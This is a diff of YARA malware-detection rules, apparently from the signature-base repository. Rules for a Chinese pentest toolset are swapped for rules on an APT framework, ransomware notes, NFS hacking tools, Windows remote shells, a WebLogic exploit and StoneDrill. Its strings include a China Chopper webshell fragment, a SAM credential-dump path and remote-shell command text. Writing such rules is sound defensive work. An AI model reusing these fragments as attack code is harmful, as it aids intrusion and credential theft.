+		reference = "https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_donotteam_ytyframework.yar#L3-L43"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3f9479151c2cada04febea45c2edcf5cece1df6c"
-		logic_hash = "cc18e68f7c3eff69a75333f3b605c89b024c6763f7b97e0ce20ce14bfe28df0d"
-		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash = "1e0c1b97925e1ed90562d2c68971e038d8506b354dd6c1d2bcc252d2a48bc31c"
+		logic_hash = "8e2841fd4550f12d88fb451a893f1ba41f0d3c123d9c195fe97366202376ef61"
+		score = 75
+		quality = 83
+		tags = "APT, DONOTTEAM, WINDOWS, FILE"
 
 	strings:
-		$s0 = "\\bin\\systemini\\MyPort.ini" wide
-		$s1 = "PortThread=200 //" fullword wide
-		$s2 = " Port Open -> " fullword wide
+		$x1 = "/football/download2/" ascii wide
+		$x2 = "/football/download/" ascii wide
+		$x3 = "Caption: Xp>" wide
+		$x_c2 = "5.135.199.0" ascii fullword
+		$a1 = "getGoogle" ascii fullword
+		$a2 = "/q /noretstart" wide
+		$a3 = "IsInSandbox" ascii fullword
+		$a4 = "syssystemnew" ascii fullword
+		$a5 = "ytyinfo" ascii fullword
+		$a6 = "\\ytyboth\\yty " ascii
+		$s1 = "SELECT Name FROM Win32_Processor" wide
+		$s2 = "SELECT Caption FROM Win32_OperatingSystem" wide
+		$s3 = "SELECT SerialNumber FROM Win32_DiskDrive" wide
+		$s4 = "VM: Yes" wide fullword
+		$s5 = "VM: No" wide fullword
+		$s6 = "helpdll.dll" ascii fullword
+		$s7 = "boothelp.exe" ascii fullword
+		$s8 = "SbieDll.dll" wide fullword
+		$s9 = "dbghelp.dll" wide fullword
+		$s10 = "YesNoMaybe" ascii fullword
+		$s11 = "saveData" ascii fullword
+		$s12 = "saveLogs" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 375KB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and ( pe.imphash ( ) == "87775285899fa860b9963b11596a2ded" or 1 of ( $x* ) or 3 of ( $a* ) or 6 of ( $s* ) )
 }
-rule SIGNATURE_BASE_CN_Honker_HASH_Pwdump7 : FILE
+rule SIGNATURE_BASE_SUSP_RANSOMWARE_Indicator_Jul20 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file PwDump7.exe"
+		description = "Detects ransomware indicator"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d61a1ac3-7c8a-5de2-a5a8-2a043b73f3b3"
-		date = "2015-06-23"
+		id = "6036fdfd-8474-5d79-ac75-137ac2efdc77"
+		date = "2020-07-28"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L577-L594"
+		reference = "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_ransom_generic.yar#L2-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "93a2d7c3a9b83371d96a575c15fe6fce6f9d50d3"
-		logic_hash = "05f735ba3f377f71ccf3a97b3597cee7b9f36213ee2ebba19db69667529d9fac"
-		score = 70
+		logic_hash = "3dd1b29f45afba16d58619416e0d420acd38fb8ae1fc846035229a27b9e5c9d9"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6"
+		hash2 = "5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473"
+		hash3 = "6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306"
 
 	strings:
-		$s1 = "%s\\SYSTEM32\\CONFIG\\SAM" fullword ascii
-		$s2 = "No Users key!" fullword ascii
-		$s3 = "NO PASSWORD*********************:" fullword ascii
-		$s4 = "Unable to dump file %S" fullword ascii
+		$ = "Decrypt.txt" ascii wide
+		$ = "DecryptFiles.txt" ascii wide
+		$ = "Decrypt-Files.txt" ascii wide
+		$ = "DecryptFilesHere.txt" ascii wide
+		$ = "DECRYPT.txt" ascii wide
+		$ = "DecryptFiles.txt" ascii wide
+		$ = "DECRYPT-FILES.txt" ascii wide
+		$ = "DecryptFilesHere.txt" ascii wide
+		$ = "DECRYPT_INSTRUCTION.TXT" ascii wide
+		$ = "FILES ENCRYPTED.txt" ascii wide
+		$ = "DECRYPT MY FILES" ascii wide
+		$ = "DECRYPT-MY-FILES" ascii wide
+		$ = "DECRYPT_MY_FILES" ascii wide
+		$ = "DECRYPT YOUR FILES" ascii wide
+		$ = "DECRYPT-YOUR-FILES" ascii wide
+		$ = "DECRYPT_YOUR_FILES" ascii wide
+		$ = "DECRYPT FILES.txt" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 380KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1400KB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Chinachopper : FILE
+rule SIGNATURE_BASE_HKTL_NFS_Fuse_NFS
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ChinaChopper.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9f7fbaac-65b5-5162-87d1-96ccd9711adb"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L596-L612"
+		description = "Detects the nfs-security-tooling fuse_nfs by HvS Consulting"
+		author = "Moritz Oettle"
+		id = "287fbe7d-ee1c-58a4-aa2d-9d9bec8321b4"
+		date = "2024-10-22"
+		modified = "2025-03-20"
+		reference = "https://github.com/hvs-consulting/nfs-security-tooling"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_HvS_nfs_security_tooling.yar#L1-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fa347fdb23ab0b8d0560a0d20c434549d78e99b5"
-		logic_hash = "e5e6a8a17592e7c82af830153905a52f8202a65c8e2f4b09dbebb19d04e2f8d7"
-		score = 70
+		logic_hash = "0bd3714b865d77660404e5f3ed1e9c7b55aadc6f58d16761111be57597784686"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "$m=get_magic_quotes_gpc();$sid=$m?stripslashes($_POST[\"z1\"]):$_POST[\"z1\"];$u" wide
-		$s3 = "SETP c:\\windows\\system32\\cmd.exe " fullword wide
-		$s4 = "Ev al (\"Exe cute(\"\"On+Error+Resume+Next:%s:Response.Write(\"\"\"\"->|\"\"\"\"" wide
+		$s1 = "NFS3ConnectionFactory" fullword ascii
+		$s2 = "fuse_to_nfs_timestamp" fullword ascii
+		$s3 = "--manual-fh" fullword ascii
+		$s4 = "--fake-uid-allow-root" fullword ascii
+		$s5 = "nfs.rpc.credential" fullword ascii
+		$s6 = "nfs.readlink" fullword ascii
+		$s7 = "pyfuse3.EntryAttributes" fullword ascii
+		$s8 = "Make nested exports on NetApp servers work" fullword ascii
+		$s9 = "add_mutually_exclusive_group" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
+		4 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Dedecms5_7 : FILE
+rule SIGNATURE_BASE_HKTL_NFS_NFS_Analyze
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file dedecms5.7.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b037862d-2821-5e96-996b-13ab241575ba"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L614-L629"
+		description = "Detects the nfs-security-tooling nfy_analyze by HvS Consulting"
+		author = "Marc Stroebel"
+		id = "3350d0ae-e638-5c8f-a578-ba0ac5521053"
+		date = "2024-10-22"
+		modified = "2025-03-20"
+		reference = "https://github.com/hvs-consulting/nfs-security-tooling"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/hktl_HvS_nfs_security_tooling.yar#L26-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f9cbb25883828ca266e32ff4faf62f5a9f92c5fb"
-		logic_hash = "57ff887906d3c5e7eafc900581eea7432c7a18364b0061d0e4deba0229663c65"
-		score = 70
+		logic_hash = "83a9e5b5b404bf28b0334611fe4f38227212783cecea3c9996d23cb00cad42ed"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "/data/admin/ver.txt" fullword ascii
-		$s2 = "SkinH_EL.dll" fullword ascii
+		$s1 = "no_root_squash_exports" fullword ascii
+		$s2 = "nfs lock manager" fullword ascii
+		$s3 = "netapp partner" fullword ascii
+		$s4 = "xdrdef.mnt3_type" fullword ascii
+		$s5 = "BTRFS subvolumes" fullword ascii
+		$s6 = "Unsupported fsid" fullword ascii
+		$s7 = "nfs3_read_etc_shadow" fullword ascii
+		$s8 = "nfs3_check_no_root_squash" fullword ascii
+		$s9 = "krb5i" fullword ascii
+		$s10 = "nfs4_overview" fullword ascii
+		$s11 = "--btrfs-subvolumes" fullword ascii
+		$s12 = "when escaping a BTRFS export" fullword ascii
+		$s13 = "No NFS server detected" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 830KB and all of them
+		6 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Alien_Ee : FILE
+rule SIGNATURE_BASE_Windowsshell_S3 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ee.exe"
+		description = "Detects simple Windows shell - file s3.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "03540f82-6662-55e3-97f8-38776271f08b"
-		date = "2015-06-23"
+		id = "064754a7-8639-5dbd-93f3-906662b8e9bc"
+		date = "2016-03-26"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L631-L646"
+		reference = "https://github.com/odzhan/shells/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winshells.yar#L10-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "15a7211154ee7aca29529bd5c2500e0d33d7f0b3"
-		logic_hash = "1f40f6c53e13aeb6b44c58f6e048a35cf3fd9fb956f26d70b3fe91bcac340ab5"
-		score = 70
+		hash = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
+		logic_hash = "b9274f909b50247a4f5111a14806faadba7814e26805bef7d61eaaf8be4b46ed"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "GetIIS UserName and PassWord." fullword wide
-		$s2 = "Read IIS ID For FreeHost." fullword wide
+		$s1 = "cmd                  - execute cmd.exe" fullword ascii
+		$s2 = "\\\\.\\pipe\\%08X" fullword ascii
+		$s3 = "get <remote> <local> - download file" fullword ascii
+		$s4 = "[ simple remote shell for windows v3" fullword ascii
+		$s5 = "REMOTE: CreateFile(\"%s\")" fullword ascii
+		$s6 = "put <local> <remote> - upload file" fullword ascii
+		$s7 = "term                 - terminate remote client" fullword ascii
+		$s8 = "[ downloading \"%s\" to \"%s\"" fullword ascii
+		$s9 = "-l           Listen for incoming connections" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Smsniff_Smsniff : FILE
+rule SIGNATURE_BASE_Windosshell_S1 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file smsniff.exe"
+		description = "Detects simple Windows shell - file s1.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fef242d5-b274-5217-a5d1-1a6ec38d0fdd"
-		date = "2015-06-23"
+		id = "b4e783a2-4a93-5c72-9b09-4692b383ac00"
+		date = "2016-03-26"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L648-L663"
+		reference = "https://github.com/odzhan/shells/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winshells.yar#L33-L53"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8667a785a8ced76d0284d225be230b5f1546f140"
-		logic_hash = "6949f992d4734f18d9caffe83f2abccca0e0decef4169954518eed078d39e561"
-		score = 70
+		hash = "4a397497cfaf91e05a9b9d6fa6e335243cca3f175d5d81296b96c13c624818bd"
+		logic_hash = "29fcddc549c615ca5cdda60272926671bc1446c3c7b51c9a2fd867b6b68858b2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "smsniff.exe" fullword wide
-		$s5 = "SmartSniff" fullword wide
+		$s1 = "[ executing cmd.exe" fullword ascii
+		$s2 = "[ simple remote shell for windows v1" fullword ascii
+		$s3 = "-p <number>  Port number to use (default is 443)" fullword ascii
+		$s4 = "usage: s1 <address> [options]" fullword ascii
+		$s5 = "[ waiting for connections on %s" fullword ascii
+		$s6 = "-l           Listen for incoming connections" fullword ascii
+		$s7 = "[ connection from %s" fullword ascii
+		$s8 = "[ %c%c requires parameter" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 267KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Happy_Happy : FILE
+rule SIGNATURE_BASE_Windowsshell_S4 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Happy.exe"
+		description = "Detects simple Windows shell - file s4.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6e6c806d-e784-507f-b327-3b9f2510422b"
-		date = "2015-06-23"
-		modified = "2023-01-27"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L665-L683"
+		id = "838771dc-f885-5332-9813-2bc01af8e5fe"
+		date = "2016-03-26"
+		modified = "2023-12-05"
+		reference = "https://github.com/odzhan/shells/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winshells.yar#L55-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "92067d8dad33177b5d6c853d4d0e897f2ee846b0"
-		logic_hash = "667cd6629ca49f2200fdc0a5eb28c77c412ca25313fd9a8afb77dedfa66d2fa1"
-		score = 70
+		hash = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
+		logic_hash = "fff280debdd32a736e37a73800f226bf6def5dd107abd1d9237d92904622c9ec"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<form.*?method=\"post\"[\\s\\S]*?</form>" fullword wide
-		$s2 = "domainscan.exe" fullword wide
-		$s3 = "http://www.happysec.com/" wide
-		$s4 = "cmdshell" fullword ascii
+		$s1 = "cmd                  - execute cmd.exe" fullword ascii
+		$s2 = "\\\\.\\pipe\\%08X" fullword ascii
+		$s3 = "get <remote> <local> - download file" fullword ascii
+		$s4 = "[ simple remote shell for windows v4" fullword ascii
+		$s5 = "REMOTE: CreateFile(\"%s\")" fullword ascii
+		$s6 = "[ downloading \"%s\" to \"%s\"" fullword ascii
+		$s7 = "[ uploading \"%s\" to \"%s\"" fullword ascii
+		$s8 = "-l           Listen for incoming connections" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 655KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_T00Ls_Lpk_Sethc_V3_0 : FILE
+rule SIGNATURE_BASE_Windowsshell_Gen : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file T00ls Lpk Sethc v3.0.exe"
+		description = "Detects simple Windows shell - from files keygen.exe, s1.exe, s2.exe, s3.exe, s4.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7513a513-e8a3-58a8-8dd5-512ba33ff013"
-		date = "2015-06-23"
+		id = "6b871e8a-8fe3-5cc6-9f2c-ba2359861ea1"
+		date = "2016-03-26"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L685-L701"
+		reference = "https://github.com/odzhan/shells/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winshells.yar#L79-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fa47c4affbac01ba5606c4862fdb77233c1ef656"
-		logic_hash = "fa65de4a135072f4d9a5d5711a4e2833b9d4a268a2a37c33d17e4546d172b6f1"
-		score = 70
+		logic_hash = "753dd12f649bcbfcc2c60a2f3be27df5297a671a0ee1856093eed04113616581"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "a7c3d85eabac01e7a7ec914477ea9f17e3020b3b2f8584a46a98eb6a2a7611c5"
+		hash2 = "4a397497cfaf91e05a9b9d6fa6e335243cca3f175d5d81296b96c13c624818bd"
+		hash3 = "df0693caae2e5914e63e9ee1a14c1e9506f13060faed67db5797c9e61f3907f0"
+		hash4 = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
+		hash5 = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
 
 	strings:
-		$s1 = "http://127.0.0.1/1.exe" fullword wide
-		$s2 = ":Rices  Forum:T00Ls.Net  [4 Fucker Te@m]" fullword wide
-		$s3 = "SkinH_EL.dll" fullword wide
+		$s0 = "[ %c%c requires parameter" fullword ascii
+		$s1 = "[ %s : %i" fullword ascii
+		$s2 = "[ %s : %s" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Netfuke_Netfuke : FILE
+rule SIGNATURE_BASE_Windowsshell_Gen2 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file NetFuke.exe"
+		description = "Detects simple Windows shell - from files s3.exe, s4.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "833da5c7-e562-50e9-a2a9-54c36b0d1f61"
-		date = "2015-06-23"
+		id = "8ed8443d-491b-5cb0-b12b-0d25267ba462"
+		date = "2016-03-26"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L703-L718"
+		reference = "https://github.com/odzhan/shells/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_winshells.yar#L101-L122"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f89e223fd4f6f5a3c2a2ea225660ef0957fc07ba"
-		logic_hash = "86f6040b743b17fb300498b02a202d1a9090054a30d490f082b116d799c4bdb2"
-		score = 70
+		logic_hash = "c5ce27554b2ee25b974b567ef5a9ae877906250073da477f0ab5d71d162ac81a"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "344575a58db288c9b5dacc654abc36d38db2e645acff05e894ff51183c61357d"
+		hash2 = "f00a1af494067b275407c449b11dfcf5cb9b59a6fac685ebd3f0eb193337e1d6"
 
 	strings:
-		$s1 = "Mac Flood: Flooding %dT %d p/s " fullword ascii
-		$s2 = "netfuke_%s.txt" fullword ascii
+		$s1 = "cmd                  - execute cmd.exe" fullword ascii
+		$s2 = "get <remote> <local> - download file" fullword ascii
+		$s3 = "REMOTE: CreateFile(\"%s\")" fullword ascii
+		$s4 = "put <local> <remote> - upload file" fullword ascii
+		$s5 = "term                 - terminate remote client" fullword ascii
+		$s6 = "[ uploading \"%s\" to \"%s\"" fullword ascii
+		$s7 = "[ error : received %i bytes" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1840KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 175KB and 2 of them ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_Manualinjection : FILE
+rule SIGNATURE_BASE_Gen_Exploit_CVE_2017_10271_Weblogic : HIGHVOL CVE_2017_10271 FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file ManualInjection.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f0899003-824f-56ed-b653-9f7a77b9ec6a"
-		date = "2015-06-23"
+		description = "Exploit for CVE-2017-10271 (Oracle WebLogic)"
+		author = "John Lambert @JohnLaTwC"
+		id = "e30e316f-1ebb-5c38-ba25-d2a9d0083a03"
+		date = "2018-03-21"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L720-L735"
+		reference = "https://github.com/c0mmand3rOpSec/CVE-2017-10271, https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_exploit_cve_2017_10271_weblogic.yar#L1-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e83d427f44783088a84e9c231c6816c214434526"
-		logic_hash = "fe8eba3b79f5bc4cf820ff51816c3f2a27d6ed8f6ab3963f88a3232c9a4b5c1e"
-		score = 70
+		logic_hash = "01e4f7b1c9c068f3953fa58749a14ea148d2b038c7266da789e0998eae83e1a7"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "HIGHVOL, CVE-2017-10271, FILE"
+		hash1 = "376c2bc11d4c366ad4f6fecffc0bea8b195e680b4c52a48d85a8d3f9fab01c95"
+		hash2 = "7d5819a2ea62376e24f0dd3cf5466d97bbbf4f5f730eb9302307154b363967ea"
+		hash3 = "864e9d8904941fae90ddd10eb03d998f85707dc2faff80cba2e365a64e830e1d/subfile"
+		hash4 = "2a69e46094d0fef2b3ffcab73086c16a10b517f58e0c1f743ece4f246889962b"
 
 	strings:
-		$s0 = "http://127.0.0.1/cookie.asp?fuck=" fullword ascii
-		$s16 = "http://Www.cnhuker.com | http://www.0855.tv" fullword ascii
+		$s1 = "<soapenv:Header"
+		$s2 = "java.beans.XMLDecoder"
+		$s3 = "void" fullword
+		$s4 = "index="
+		$s5 = "/array>"
+		$s6 = "\"start\""
+		$s7 = "work:WorkContext" nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and all of them
+		filesize < 10KB and ( uint32( 0 ) == 0x616f733c or uint32( 0 ) == 0x54534f50 ) and all of ( $s* )
 }
-rule SIGNATURE_BASE_CN_Honker_Cncert_Ccdoor_CMD : FILE
+
+rule SIGNATURE_BASE_Susp_File_Enumerator_With_Encrypted_Resource_101 : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file CnCerT.CCdoor.CMD.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ddd328a8-7ad8-5b26-9deb-3e5da801cd1b"
-		date = "2015-06-23"
+		description = "Generic detection for samples that enumerate files with encrypted resource called 101"
+		author = "Kaspersky Lab"
+		id = "9bc16ec2-c94c-54f5-b09c-88a78e9e3fb2"
+		date = "2025-01-04"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L737-L754"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L12-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1c6ed7d817fa8e6534a5fd36a94f4fc2f066c9cd"
-		logic_hash = "3c068c3d21de8c071b3eec354f03423d4902ef0156bb9dcad370cf688bc03426"
-		score = 70
-		quality = 85
+		hash = "2cd0a5f1e9bcce6807e57ec8477d222a"
+		hash = "c843046e54b755ec63ccb09d0a689674"
+		logic_hash = "0a207038b3cbba88d05cd6a053fd14337ac1fbb08b2a532b542ee2bb6b881a5a"
+		score = 65
+		quality = 44
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s2 = "CnCerT.CCdoor.CMD.dll" fullword wide
-		$s3 = "cmdpath" fullword ascii
-		$s4 = "Get4Bytes" fullword ascii
-		$s5 = "ExcuteCmd" fullword ascii
+		$mz = "This program cannot be run in DOS mode."
+		$a1 = "FindFirstFile" ascii wide nocase
+		$a2 = "FindNextFile" ascii wide nocase
+		$a3 = "FindResource" ascii wide nocase
+		$a4 = "LoadResource" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 22KB and all of them
+		uint16( 0 ) == 0x5A4D and all of them and filesize < 700000 and pe.number_of_sections > 4 and pe.number_of_resources > 1 and pe.number_of_resources < 15 and for any i in ( 0 .. pe.number_of_resources - 1 ) : ( ( math.entropy ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) > 7.8 ) and pe.resources [ i ] . id == 101 and pe.resources [ i ] . length > 20000 and pe.resources [ i ] . language == 0 and not ( $mz in ( pe.resources [ i ] . offset..pe.resources [ i ] . offset + pe.resources [ i ] . length ) ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Termsrvhack : FILE
+rule SIGNATURE_BASE_Stonedrill_Main_Sub : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file termsrvhack.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4fd582a1-3c6d-57a1-bba0-f775bb61ef00"
-		date = "2015-06-23"
+		description = "Rule to detect StoneDrill (decrypted) samples"
+		author = "Kaspersky Lab"
+		id = "92f53e6a-8f49-5ffa-8c16-3ec3e6f2bdcd"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L756-L771"
+		reference = "https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_stonedrill.yar#L43-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1c456520a7b7faf71900c71167038185f5a7d312"
-		logic_hash = "ef0b9965e2d419230a7a8425674edb356347d1e41538d19fc67f8b0fbc69091f"
-		score = 70
+		logic_hash = "794094c0cbb81f6f971e16de36d444351b17cf38a91d8210f914b80da7d9ed26"
+		score = 75
 		quality = 85
 		tags = "FILE"
